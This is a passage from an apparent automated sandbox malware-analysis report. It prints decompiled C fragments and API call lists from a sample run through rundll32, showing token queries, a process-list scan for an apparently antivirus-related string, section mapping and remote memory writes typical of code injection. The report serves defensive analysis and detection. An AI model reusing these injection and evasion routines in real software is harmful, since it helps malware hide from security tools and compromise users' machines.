				asm("stosd");
				asm("stosd");
				_v20 = _a4;
				_t48 = 0;
				_v16 = 0;
				_a4 = 0;
				_v44 = 0x18;
				_v40 = 0;
				_v32 = 0;
				_v36 = 0;
				_v28 = 0;
				_v24 = 0;
				if(NtOpenProcess( &_v12, 0x400,  &_v44,  &_v20) >= 0) {
					_t33 =  &_v8;
					__imp__(_v12, 8, _t33);
					if(_t33 >= 0) {
						_t47 = __imp__;
						 *_t47(_v8, 1, 0, 0,  &_a4, _t43); // executed
						_t44 = E00E55FBC(_a4);
						if(_t44 != 0) {
							_t40 =  *_t47(_v8, 1, _t44, _a4,  &_a4); // executed
							if(_t40 >= 0) {
								memcpy(_a8,  *_t44, 0x1c);
								_t48 = 1;
							}
							E00E513CC(_t44);
						}
						NtClose(_v8); // executed
					}
					NtClose(_v12);
				}
				return _t48;
			}



















                                                          0x00e540e9
                                                          0x00e540ea
                                                          0x00e540eb
                                                          0x00e540ec
                                                          0x00e540ed
                                                          0x00e540f1
                                                          0x00e540f8
                                                          0x00e54107
                                                          0x00e5410a
                                                          0x00e5410d
                                                          0x00e54114
                                                          0x00e54117
                                                          0x00e5411a
                                                          0x00e5411d
                                                          0x00e54120
                                                          0x00e5412b
                                                          0x00e5412d
                                                          0x00e54136
                                                          0x00e5413e
                                                          0x00e54140
                                                          0x00e54152
                                                          0x00e5415c
                                                          0x00e54160
                                                          0x00e5416f
                                                          0x00e54173
                                                          0x00e5417c
                                                          0x00e54184
                                                          0x00e54184
                                                          0x00e54186
                                                          0x00e54186
                                                          0x00e5418e
                                                          0x00e54194
                                                          0x00e54198
                                                          0x00e54198
                                                          0x00e541a3

                                                          APIs
                                                          • NtOpenProcess.NTDLL(00000000,00000400,?,?), ref: 00E54123
                                                          • NtOpenProcessToken.NTDLL(00000000,00000008,00000000), ref: 00E54136
                                                          • NtQueryInformationToken.NTDLL(00000000,00000001,00000000,00000000,00000000), ref: 00E54152
                                                            • Part of subcall function 00E55FBC: RtlAllocateHeap.NTDLL(00000000,00000000,00E52035), ref: 00E55FC8
                                                          • NtQueryInformationToken.NTDLL(00000000,00000001,00000000,00000000,00000000), ref: 00E5416F
                                                          • memcpy.NTDLL(00000000,00000000,0000001C), ref: 00E5417C
                                                          • NtClose.NTDLL(00000000), ref: 00E5418E
                                                          • NtClose.NTDLL(00000000), ref: 00E54198
                                                          Memory Dump Source
                                                          • Source File: 00000015.00000002.738756359.0000000000E51000.00000020.00020000.sdmp, Offset: 00E50000, based on PE: true
                                                          • Associated: 00000015.00000002.738720079.0000000000E50000.00000004.00020000.sdmp Download File
                                                          • Associated: 00000015.00000002.738826659.0000000000E59000.00000002.00020000.sdmp Download File
                                                          • Associated: 00000015.00000002.738873414.0000000000E5A000.00000004.00020000.sdmp Download File
                                                          • Associated: 00000015.00000002.738891661.0000000000E5C000.00000002.00020000.sdmp Download File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_21_2_e50000_rundll32.jbxd
                                                          Similarity
                                                          • API ID: Token$CloseInformationOpenProcessQuery$AllocateHeapmemcpy
                                                          • String ID:
                                                          • API String ID: 2575439697-0
                                                          • Opcode ID: 5bb27f53fbd83ebb02c5d0e87249873767a075dd6b594b8b385dacd0b1effcb0
                                                          • Instruction ID: 4c1dbed92c23ad270c95eb3c6f5865d6555affbc7c46ed01f3b897281f402d0f
                                                          • Opcode Fuzzy Hash: 5bb27f53fbd83ebb02c5d0e87249873767a075dd6b594b8b385dacd0b1effcb0
                                                          • Instruction Fuzzy Hash: 462144B2901228BFDF00AF95CD45ADEBFBCEB08751F004462FA00F6160D7718A888BA0
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 00E52102, Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 41processCOMMON
                                                          Download Yara Rule
                                                          C-Code - Quality: 100%
                                                          			E00E52102() {
				char _v264;
				void* _v300;
				void* _t5;
				int _t8;
				intOrPtr _t9;
				int _t15;
				void* _t17;

				_t15 = 0;
				_t5 = CreateToolhelp32Snapshot(2, 0); // executed
				_t17 = _t5;
				if(_t17 != 0) {
					_t8 = Process32First(_t17,  &_v300); // executed
					while(_t8 != 0) {
						_t9 =  *0xe5a2d4; // 0x435d5a8
						_t2 = _t9 + 0xe5bde4; // 0x73617661
						if(StrStrIA( &_v264, _t2) != 0) {
							_t15 = 1;
						} else {
							_t8 = Process32Next(_t17,  &_v300);
							continue;
						}
						L7:
						CloseHandle(_t17);
						goto L8;
					}
					goto L7;
				}
				L8:
				return _t15;
			}










                                                          0x00e5210d
                                                          0x00e52112
                                                          0x00e52117
                                                          0x00e5211b
                                                          0x00e52125
                                                          0x00e52156
                                                          0x00e5212c
                                                          0x00e52131
                                                          0x00e52147
                                                          0x00e5215e
                                                          0x00e52149
                                                          0x00e52151
                                                          0x00000000
                                                          0x00e52151
                                                          0x00e5215f
                                                          0x00e52160
                                                          0x00000000
                                                          0x00e52160
                                                          0x00000000
                                                          0x00e5215a
                                                          0x00e52166
                                                          0x00e5216b

                                                          APIs
                                                          • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 00E52112
                                                          • Process32First.KERNEL32(00000000,?), ref: 00E52125
                                                          • StrStrIA.SHLWAPI(?,73617661,00000000,00000000), ref: 00E5213F
                                                          • Process32Next.KERNEL32(00000000,?), ref: 00E52151
                                                          • CloseHandle.KERNEL32(00000000), ref: 00E52160
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000015.00000002.738756359.0000000000E51000.00000020.00020000.sdmp, Offset: 00E50000, based on PE: true
                                                          • Associated: 00000015.00000002.738720079.0000000000E50000.00000004.00020000.sdmp Download File
                                                          • Associated: 00000015.00000002.738826659.0000000000E59000.00000002.00020000.sdmp Download File
                                                          • Associated: 00000015.00000002.738873414.0000000000E5A000.00000004.00020000.sdmp Download File
                                                          • Associated: 00000015.00000002.738891661.0000000000E5C000.00000002.00020000.sdmp Download File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_21_2_e50000_rundll32.jbxd
                                                          Similarity
                                                          • API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32
                                                          • String ID: zu
                                                          • API String ID: 420147892-1569895686
                                                          • Opcode ID: cc3798eeb1a3ea41fde615323d3b56a66014c7b39bb144a15f7db08c15aeae09
                                                          • Instruction ID: b3af6246a4dbf096578d54a96333fb3fd09fdd1ff14f227a8aae94fe21e27d72
                                                          • Opcode Fuzzy Hash: cc3798eeb1a3ea41fde615323d3b56a66014c7b39bb144a15f7db08c15aeae09
                                                          • Instruction Fuzzy Hash: 11F096322025246AD720A7769E49EEB77ACDBC6316F0019A5FF05F2101EB249A4E4AA1
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 055909D7, Relevance: 9.1, APIs: 6, Instructions: 94threadmemorynativeCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • GetSystemTimeAsFileTime.KERNEL32(?), ref: 05590A02
                                                          • HeapCreate.KERNEL32(00000000,00400000,00000000), ref: 05590A0F
                                                          • NtQueryInformationThread.NTDLL(000000FE,00000009,?,00000004,?), ref: 05590A9B
                                                          • GetModuleHandleA.KERNEL32(00000000), ref: 05590AA6
                                                          • RtlImageNtHeader.NTDLL(00000000), ref: 05590AAF
                                                          • RtlExitUserThread.NTDLL(00000000), ref: 05590AC4
                                                            • Part of subcall function 05589DA0: CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,05590A3D,?), ref: 05589DA8
                                                            • Part of subcall function 05589DA0: GetVersion.KERNEL32 ref: 05589DB7
                                                            • Part of subcall function 05589DA0: GetCurrentProcessId.KERNEL32 ref: 05589DC6
                                                            • Part of subcall function 05589DA0: OpenProcess.KERNEL32(0010047A,00000000,00000000), ref: 05589DE3
                                                            • Part of subcall function 0557BD01: memcpy.NTDLL(00000000,?,?,?), ref: 0557BD60
                                                            • Part of subcall function 05592015: GetModuleFileNameW.KERNEL32(00000000,00000000,00000104,00000208,00000000,00000000,?,?,05577083), ref: 0559203B
                                                            • Part of subcall function 055724A8: OpenProcess.KERNEL32(00000400,00000000,?), ref: 055724C3
                                                            • Part of subcall function 055724A8: IsWow64Process.KERNEL32(?,?), ref: 055724D4
                                                            • Part of subcall function 055724A8: CloseHandle.KERNEL32(?,?,?), ref: 055724E7
                                                          Memory Dump Source
                                                          • Source File: 00000015.00000002.743135390.0000000005570000.00000040.00020000.sdmp, Offset: 05570000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_21_2_5570000_rundll32.jbxd
                                                          Similarity
                                                          • API ID: Process$CreateFileHandleModuleOpenThreadTime$CloseCurrentEventExitHeaderHeapImageInformationNameQuerySystemUserVersionWow64memcpy
                                                          • String ID:
                                                          • API String ID: 3825956196-0
                                                          • Opcode ID: 324a4cce3e0dbd1fc0d7feeef100aaf9fa965cef45dad611c908efd5767434dd
                                                          • Instruction ID: e7f186f9a1c3a9aa8747ef982c20df14ca8c249101e3e7cc628e0b72638ff0d2
                                                          • Opcode Fuzzy Hash: 324a4cce3e0dbd1fc0d7feeef100aaf9fa965cef45dad611c908efd5767434dd
                                                          • Instruction Fuzzy Hash: E831D432A01114AFCF25EFA4DC89D7EBBB9FB44760B160526F502E71A0DA3C9D44D791
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 055737F6, Relevance: 7.7, APIs: 5, Instructions: 234nativeCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • memcpy.NTDLL(-00000040,0558BE0C,00000800,00000000,00000000,00000000,75145520), ref: 05573A37
                                                            • Part of subcall function 055747C1: GetModuleHandleA.KERNEL32(?,00000020,00000000,0557D41D,?,?,?,?,05573905,?,?,00000000,00000000,75145520), ref: 055747E6
                                                            • Part of subcall function 055747C1: GetProcAddress.KERNEL32(00000000,?), ref: 05574808
                                                            • Part of subcall function 055747C1: GetProcAddress.KERNEL32(00000000,?), ref: 0557481E
                                                            • Part of subcall function 055747C1: GetProcAddress.KERNEL32(00000000,?), ref: 05574834
                                                            • Part of subcall function 055747C1: GetProcAddress.KERNEL32(00000000,?), ref: 0557484A
                                                            • Part of subcall function 055747C1: GetProcAddress.KERNEL32(00000000,?), ref: 05574860
                                                            • Part of subcall function 0558A8F7: NtMapViewOfSection.NTDLL(00000000,000000FF,0558B8EC,00000000,00000000,0558B8EC,00000000,00000002,00000000,?,?,00000000,0558B8EC,000000FF,00000000), ref: 0558A925
                                                            • Part of subcall function 0558391E: memcpy.NTDLL(?,?,05571A31,00000000,00000000,?,00000000,00000000,?,?,00000000,00000000,75145520), ref: 05583984
                                                            • Part of subcall function 0558391E: memcpy.NTDLL(00000000,?,?), ref: 055839E3
                                                          • memcpy.NTDLL(?,00000000,?,?,0557D41D,00000000,00000000,00000000,?,?,00000000,00000000,75145520), ref: 05573964
                                                          • memcpy.NTDLL(00000018,00000000,00000018,?,0557D41D,00000000,00000000,00000000,?,?,00000000,00000000,75145520), ref: 055739B0
                                                          • NtUnmapViewOfSection.NTDLL(000000FF,00000000,00000000,75145520), ref: 05573A75
                                                          • memset.NTDLL ref: 05573AB7
                                                          Memory Dump Source
                                                          • Source File: 00000015.00000002.743135390.0000000005570000.00000040.00020000.sdmp, Offset: 05570000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_21_2_5570000_rundll32.jbxd
                                                          Similarity
                                                          • API ID: AddressProcmemcpy$SectionView$HandleModuleUnmapmemset
                                                          • String ID:
                                                          • API String ID: 1575695328-0
                                                          • Opcode ID: ded4e2cce26759fa4c4b604456e301f6720ad39050fa087bb798c9b4784c8c2f
                                                          • Instruction ID: e9c08e5e572cd86574d2f02a85de6fe990efe5539cab75460d4fb48057bb2318
                                                          • Opcode Fuzzy Hash: ded4e2cce26759fa4c4b604456e301f6720ad39050fa087bb798c9b4784c8c2f
                                                          • Instruction Fuzzy Hash: 3B916C71A0060EEFCF10DFA8D885AAEBBB5FF04314F154869E801A7650E735AA54EB90
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 0558B878, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 71nativeCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • NtCreateSection.NTDLL(00000000,000F001F,?,?,?,08000000,00000000,75144EE0,00000000,00000000), ref: 0558B8D5
                                                            • Part of subcall function 0558A8F7: NtMapViewOfSection.NTDLL(00000000,000000FF,0558B8EC,00000000,00000000,0558B8EC,00000000,00000002,00000000,?,?,00000000,0558B8EC,000000FF,00000000), ref: 0558A925
                                                          • memset.NTDLL ref: 0558B8F9
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000015.00000002.743135390.0000000005570000.00000040.00020000.sdmp, Offset: 05570000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_21_2_5570000_rundll32.jbxd
                                                          Similarity
                                                          • API ID: Section$CreateViewmemset
                                                          • String ID: @
                                                          • API String ID: 2533685722-2766056989
                                                          • Opcode ID: 361bd8fbd3ad8024ebd352a4977c6b370a89d7e86cbdc425b418d7e79a00c4ac
                                                          • Instruction ID: df6c2b78daf1d0fbc4c686d84d1dc82dc7b9fac33410c326058d38bb8120333c
                                                          • Opcode Fuzzy Hash: 361bd8fbd3ad8024ebd352a4977c6b370a89d7e86cbdc425b418d7e79a00c4ac
                                                          • Instruction Fuzzy Hash: 81210BB6E00209AFDB11EFA9C8849EEFBB9FB48354F10452AE515F3250D7349A458FA0
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 0559079B, Relevance: 4.7, APIs: 3, Instructions: 168librarynativeloaderCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • GetProcAddress.KERNEL32(?,00000318), ref: 055907C0
                                                          • NtWow64QueryInformationProcess64.NTDLL(00000000,00000000,?,00000030,00000000), ref: 055907DC
                                                            • Part of subcall function 05585EA9: RtlAllocateHeap.NTDLL(00000000,?,05586423), ref: 05585EB5
                                                            • Part of subcall function 05580E3E: GetProcAddress.KERNEL32(?,00000000), ref: 05580E67
                                                            • Part of subcall function 05580E3E: NtWow64ReadVirtualMemory64.NTDLL(00000100,?,?,00000028,00000000,00000000,00000100,00000000,?,?,?,0559081D,00000000,00000000,00000028,00000100), ref: 05580E89
                                                          • StrRChrA.SHLWAPI(00000018,00000000,0000005C,00000000,00000318,?,00000000,00000068,00000098,00000000,00000028,00000040,00000000,00000000,00000028,00000100), ref: 05590946
                                                          Memory Dump Source
                                                          • Source File: 00000015.00000002.743135390.0000000005570000.00000040.00020000.sdmp, Offset: 05570000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_21_2_5570000_rundll32.jbxd
                                                          Similarity
                                                          • API ID: AddressProcWow64$AllocateHeapInformationMemory64Process64QueryReadVirtual
                                                          • String ID:
                                                          • API String ID: 3547194813-0
                                                          • Opcode ID: 8b1a81a6b1483d5879948ff8eb088f2ddce026d93ddb408c038ee8361b768742
                                                          • Instruction ID: 521932493da40575f9abcb9f2ba118d7b90fad2edc423c2e3b78ed7381cd44bc
                                                          • Opcode Fuzzy Hash: 8b1a81a6b1483d5879948ff8eb088f2ddce026d93ddb408c038ee8361b768742
                                                          • Instruction Fuzzy Hash: 97616071A0020AAFDF14DFA5C884BEEBBB5FF48700F044559E959E7291D738E954CBA0
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 05585878, Relevance: 4.6, APIs: 3, Instructions: 56librarynativeloaderCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • memset.NTDLL ref: 0558588C
                                                          • GetProcAddress.KERNEL32(?), ref: 055858B4
                                                          • NtWow64QueryInformationProcess64.NTDLL(?,00000000,?,00000030,?,?,00001000,00000000), ref: 055858D2
                                                          Memory Dump Source
                                                          • Source File: 00000015.00000002.743135390.0000000005570000.00000040.00020000.sdmp, Offset: 05570000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_21_2_5570000_rundll32.jbxd
                                                          Similarity
                                                          • API ID: AddressInformationProcProcess64QueryWow64memset
                                                          • String ID:
                                                          • API String ID: 2968673968-0
                                                          • Opcode ID: b701da54cbfc6256989853f352629e96833df37c741d3c23383a5a9e1ad1b317
                                                          • Instruction ID: b34083cb7dc1e42ff804e9e3e6a1da6751865f4058fa512fd225572cd5059940
                                                          • Opcode Fuzzy Hash: b701da54cbfc6256989853f352629e96833df37c741d3c23383a5a9e1ad1b317
                                                          • Instruction Fuzzy Hash: 7F117031A14219BFDB10EB94DC4AFA97BA9FB84754F050026F905FB290EB74ED09DB60
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 0558A71C, Relevance: 4.5, APIs: 3, Instructions: 29memorynativeCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • NtAllocateVirtualMemory.NTDLL(05585620,00000000,00000000,05585620,00003000,00000040), ref: 0558A74D
                                                          • RtlNtStatusToDosError.NTDLL(00000000), ref: 0558A754
                                                          • SetLastError.KERNEL32(00000000), ref: 0558A75B
                                                          Memory Dump Source
                                                          • Source File: 00000015.00000002.743135390.0000000005570000.00000040.00020000.sdmp, Offset: 05570000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_21_2_5570000_rundll32.jbxd
                                                          Similarity
                                                          • API ID: Error$AllocateLastMemoryStatusVirtual
                                                          • String ID:
                                                          • API String ID: 722216270-0
                                                          • Opcode ID: a2aae58e40181b82c1bb384beaad6572158e03a4e74f2ff562ba7f26d2f41f93
                                                          • Instruction ID: 3ebee9477d586d42d6d61e2e8eb3c397d4e2899335ee05e28510b1b180ba70a1
                                                          • Opcode Fuzzy Hash: a2aae58e40181b82c1bb384beaad6572158e03a4e74f2ff562ba7f26d2f41f93
                                                          • Instruction Fuzzy Hash: 8FF0F471520309FFEB05DB94D94AFED7BBCEB44355F104049B501E6080EBB89B08E764
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 05588890, Relevance: 4.5, APIs: 3, Instructions: 26nativeCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • NtWriteVirtualMemory.NTDLL(00000318,00000000,00000000,?,055856C2,00000000,?,055856C2,?,00000000,00000000,00000318,00000020,?,00010003,?), ref: 055888AE
                                                          • RtlNtStatusToDosError.NTDLL(C0000002), ref: 055888BD
                                                          • SetLastError.KERNEL32(00000000,?,055856C2,?,00000000,00000000,00000318,00000020,?,00010003,?,?,00000318,00000008), ref: 055888C4
                                                          Memory Dump Source
                                                          • Source File: 00000015.00000002.743135390.0000000005570000.00000040.00020000.sdmp, Offset: 05570000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_21_2_5570000_rundll32.jbxd
                                                          Similarity
                                                          • API ID: Error$LastMemoryStatusVirtualWrite
                                                          • String ID:
                                                          • API String ID: 1089604434-0
                                                          • Opcode ID: 2bc3ac739df1ad78718f6bc9afe3c5af43b94833906e26c5a1b129943efab188
                                                          • Instruction ID: c0156a53b3f3ce1c8dc24f6e0643aa778a66f696741936d3836d9f47ceeef9c2
                                                          • Opcode Fuzzy Hash: 2bc3ac739df1ad78718f6bc9afe3c5af43b94833906e26c5a1b129943efab188
                                                          • Instruction Fuzzy Hash: 37E0483261421AABDF016FD49C05DAB7F59FB48751F454C11FE01D6121DB35C425ABE0
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 00E55A5D, Relevance: 3.1, APIs: 2, Instructions: 122COMMON
                                                          Download Yara Rule
                                                          C-Code - Quality: 21%
                                                          			E00E55A5D(void* __ecx, intOrPtr* __esi, void* __eflags, signed int _a4, char _a8) {
				intOrPtr _v8;
				char _v12;
				signed int _t37;
				long _t39;
				long _t40;
				signed int _t41;
				intOrPtr _t42;
				signed int _t43;
				intOrPtr _t44;
				intOrPtr _t45;
				intOrPtr _t46;
				intOrPtr _t48;
				void* _t65;
				intOrPtr* _t67;
				intOrPtr* _t68;
				void* _t71;

				_t68 = __esi;
				_t65 = E00E53FC1(_t37, _a4);
				if(_t65 == 0) {
					L18:
					_t39 = GetLastError();
				} else {
					_t40 = GetVersion();
					_t71 = _t40 - 6;
					if(_t71 > 0 || _t71 == 0 && _t40 > 2) {
						_a4 = 4;
					} else {
						_a4 = 0;
					}
					__imp__(_t65, _a4, 0, 0, 0); // executed
					 *(_t68 + 0x10) = _t40;
					_t41 = E00E513CC(_t65);
					if( *(_t68 + 0x10) == 0) {
						goto L18;
					} else {
						_t42 = E00E53FC1(_t41,  *_t68);
						_v8 = _t42;
						if(_t42 == 0) {
							goto L18;
						} else {
							_t67 = __imp__; // 0x7042f5a0
							if(_a8 == 0) {
								L10:
								__imp__( *(_t68 + 0x10), _v8, 0x50, 0);
								 *((intOrPtr*)(_t68 + 0x14)) = _t42;
								_t43 = E00E513CC(_v8);
								if( *((intOrPtr*)(_t68 + 0x14)) == 0) {
									goto L18;
								} else {
									_a4 = 0x100;
									_t44 = E00E53FC1(_t43,  *((intOrPtr*)(_t68 + 4)));
									_v8 = _t44;
									if(_t44 == 0) {
										goto L18;
									} else {
										_t45 =  *0xe5a2d4; // 0x435d5a8
										_t21 = _t45 + 0xe5b76c; // 0x450047
										_t46 = _t21;
										__imp__( *((intOrPtr*)(_t68 + 0x14)), _t46, _v8, 0, 0, 0, _a4); // executed
										 *((intOrPtr*)(_t68 + 0x18)) = _t46;
										E00E513CC(_v8);
										_t48 =  *((intOrPtr*)(_t68 + 0x18));
										if(_t48 == 0) {
											goto L18;
										} else {
											_v12 = 4;
											__imp__(_t48, 0x1f,  &_a4,  &_v12);
											if(_t48 != 0) {
												_a4 = _a4 | 0x00000100;
												 *_t67( *((intOrPtr*)(_t68 + 0x18)), 0x1f,  &_a4, 4);
											}
											_push(4);
											_push( &_a8);
											_push(6);
											_push( *((intOrPtr*)(_t68 + 0x18)));
											if( *_t67() == 0) {
												goto L18;
											} else {
												_push(4);
												_push( &_a8);
												_push(5);
												_push( *((intOrPtr*)(_t68 + 0x18)));
												if( *_t67() == 0) {
													goto L18;
												} else {
													_t39 = 0;
												}
											}
										}
									}
								}
							} else {
								_t42 =  *_t67( *(_t68 + 0x10), 3,  &_a8, 4);
								if(_t42 == 0) {
									goto L18;
								} else {
									goto L10;
								}
							}
						}
					}
				}
				return _t39;
			}



















                                                          0x00e55a5d
                                                          0x00e55a6c
                                                          0x00e55a72
                                                          0x00e55ba8
                                                          0x00e55ba8
                                                          0x00e55a78
                                                          0x00e55a78
                                                          0x00e55a7e
                                                          0x00e55a80
                                                          0x00e55a8e
                                                          0x00e55a89
                                                          0x00e55a89
                                                          0x00e55a89
                                                          0x00e55a9c
                                                          0x00e55aa3
                                                          0x00e55aa6
                                                          0x00e55aae
                                                          0x00000000
                                                          0x00e55ab4
                                                          0x00e55ab6
                                                          0x00e55abd
                                                          0x00e55ac0
                                                          0x00000000
                                                          0x00e55ac6
                                                          0x00e55ac9
                                                          0x00e55acf
                                                          0x00e55ae6
                                                          0x00e55aef
                                                          0x00e55af8
                                                          0x00e55afb
                                                          0x00e55b03
                                                          0x00000000
                                                          0x00e55b09
                                                          0x00e55b11
                                                          0x00e55b14
                                                          0x00e55b1d
                                                          0x00e55b20
                                                          0x00000000
                                                          0x00e55b26
                                                          0x00e55b29
                                                          0x00e55b34
                                                          0x00e55b34
                                                          0x00e55b3e
                                                          0x00e55b47
                                                          0x00e55b4a
                                                          0x00e55b4f
                                                          0x00e55b54
                                                          0x00000000
                                                          0x00e55b56
                                                          0x00e55b61
                                                          0x00e55b68
                                                          0x00e55b70
                                                          0x00e55b72
                                                          0x00e55b80
                                                          0x00e55b80
                                                          0x00e55b82
                                                          0x00e55b87
                                                          0x00e55b88
                                                          0x00e55b8a
                                                          0x00e55b91
                                                          0x00000000
                                                          0x00e55b93
                                                          0x00e55b93
                                                          0x00e55b98
                                                          0x00e55b99
                                                          0x00e55b9b
                                                          0x00e55ba2
                                                          0x00000000
                                                          0x00e55ba4
                                                          0x00e55ba4
                                                          0x00e55ba4
                                                          0x00e55ba2
                                                          0x00e55b91
                                                          0x00e55b54
                                                          0x00e55b20
                                                          0x00e55ad1
                                                          0x00e55adc
                                                          0x00e55ae0
                                                          0x00000000
                                                          0x00000000
                                                          0x00000000
                                                          0x00000000
                                                          0x00e55ae0
                                                          0x00e55acf
                                                          0x00e55ac0
                                                          0x00e55aae
                                                          0x00e55bb1

                                                          APIs
                                                            • Part of subcall function 00E53FC1: lstrlen.KERNEL32(?,00000000,051B9CD0,74ECC740,00E535B6,051B9ED5,?,KE,?,KE,?,69B25F44,E8FA7DD7,00000000), ref: 00E53FC8
                                                            • Part of subcall function 00E53FC1: mbstowcs.NTDLL ref: 00E53FF1
                                                            • Part of subcall function 00E53FC1: memset.NTDLL ref: 00E54003
                                                          • GetVersion.KERNEL32(00000000,0000EA60,00000008,?,?,?,00E5135B,751881D0,00000000,051B9698,?,?,00E530D3,?,051B9698,0000EA60), ref: 00E55A78
                                                          • GetLastError.KERNEL32(00000000,0000EA60,00000008,?,?,?,00E5135B,751881D0,00000000,051B9698,?,?,00E530D3,?,051B9698,0000EA60), ref: 00E55BA8
                                                          Memory Dump Source
                                                          • Source File: 00000015.00000002.738756359.0000000000E51000.00000020.00020000.sdmp, Offset: 00E50000, based on PE: true
                                                          • Associated: 00000015.00000002.738720079.0000000000E50000.00000004.00020000.sdmp Download File
                                                          • Associated: 00000015.00000002.738826659.0000000000E59000.00000002.00020000.sdmp Download File
                                                          • Associated: 00000015.00000002.738873414.0000000000E5A000.00000004.00020000.sdmp Download File
                                                          • Associated: 00000015.00000002.738891661.0000000000E5C000.00000002.00020000.sdmp Download File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_21_2_e50000_rundll32.jbxd
                                                          Similarity
                                                          • API ID: ErrorLastVersionlstrlenmbstowcsmemset
                                                          • String ID:
                                                          • API String ID: 4097109750-0
                                                          • Opcode ID: e6fd3575af9b976447934c647f064a6597fb26a53f8d8c4becbcf1fdae6a31fe
                                                          • Instruction ID: cbe67af6f9bda08fdc17cba7ab5b65743a881badc3493074717e446daf542575
                                                          • Opcode Fuzzy Hash: e6fd3575af9b976447934c647f064a6597fb26a53f8d8c4becbcf1fdae6a31fe
                                                          • Instruction Fuzzy Hash: 2541AF72500709FFDF209FA1CC99EAA7BB8EF04346F005D29BA01A64A1D730DA48DB60
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 00E56EB3, Relevance: 3.1, APIs: 2, Instructions: 70nativeCOMMON
                                                          Download Yara Rule
                                                          C-Code - Quality: 72%
                                                          			E00E56EB3(intOrPtr* __eax, void** _a4) {
				int _v12;
				void* _v16;
				void* _v20;
				void* _v24;
				int _v28;
				int _v32;
				intOrPtr _v36;
				int _v40;
				int _v44;
				void* _v48;
				void* __esi;
				long _t34;
				void* _t39;
				void* _t47;
				intOrPtr* _t48;

				_t48 = __eax;
				asm("stosd");
				asm("stosd");
				asm("stosd");
				asm("stosd");
				asm("stosd");
				asm("stosd");
				_v24 =  *((intOrPtr*)(__eax + 4));
				_v16 = 0;
				_v12 = 0;
				_v48 = 0x18;
				_v44 = 0;
				_v36 = 0x40;
				_v40 = 0;
				_v32 = 0;
				_v28 = 0;
				_t34 = NtCreateSection( &_v16, 0xf001f,  &_v48,  &_v24,  *(__eax + 8), 0x8000000, 0);
				if(_t34 < 0) {
					_t47 =  *((intOrPtr*)(_t48 + 0x18))(_t34);
				} else {
					 *_t48 = _v16;
					_t39 = E00E57666(_t48,  &_v12); // executed
					_t47 = _t39;
					if(_t47 != 0) {
						 *((intOrPtr*)(_t48 + 0x1c))(_v16);
					} else {
						memset(_v12, 0, _v24);
						 *_a4 = _v12;
					}
				}
				return _t47;
			}


















                                                          0x00e56ebc
                                                          0x00e56ec3
                                                          0x00e56ec4
                                                          0x00e56ec5
                                                          0x00e56ec6
                                                          0x00e56ec7
                                                          0x00e56ed8
                                                          0x00e56edc
                                                          0x00e56ef0
                                                          0x00e56ef3
                                                          0x00e56ef6
                                                          0x00e56efd
                                                          0x00e56f00
                                                          0x00e56f07
                                                          0x00e56f0a
                                                          0x00e56f0d
                                                          0x00e56f10
                                                          0x00e56f15
                                                          0x00e56f50
                                                          0x00e56f17
                                                          0x00e56f1a
                                                          0x00e56f20
                                                          0x00e56f25
                                                          0x00e56f29
                                                          0x00e56f47
                                                          0x00e56f2b
                                                          0x00e56f32
                                                          0x00e56f40
                                                          0x00e56f40
                                                          0x00e56f29
                                                          0x00e56f58

                                                          APIs
                                                          • NtCreateSection.NTDLL(?,000F001F,?,?,?,08000000,00000000,75144EE0,00000000,00000000,00E56B8B), ref: 00E56F10
                                                            • Part of subcall function 00E57666: NtMapViewOfSection.NTDLL(00000000,000000FF,?,00000000,00000000,?,00E56F25,00000002,00000000,?,?,00000000,?,?,00E56F25,00000000), ref: 00E57693
                                                          • memset.NTDLL ref: 00E56F32
                                                          Memory Dump Source
                                                          • Source File: 00000015.00000002.738756359.0000000000E51000.00000020.00020000.sdmp, Offset: 00E50000, based on PE: true
                                                          • Associated: 00000015.00000002.738720079.0000000000E50000.00000004.00020000.sdmp Download File
                                                          • Associated: 00000015.00000002.738826659.0000000000E59000.00000002.00020000.sdmp Download File
                                                          • Associated: 00000015.00000002.738873414.0000000000E5A000.00000004.00020000.sdmp Download File
                                                          • Associated: 00000015.00000002.738891661.0000000000E5C000.00000002.00020000.sdmp Download File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_21_2_e50000_rundll32.jbxd
                                                          Similarity
                                                          • API ID: Section$CreateViewmemset
                                                          • String ID:
                                                          • API String ID: 2533685722-0
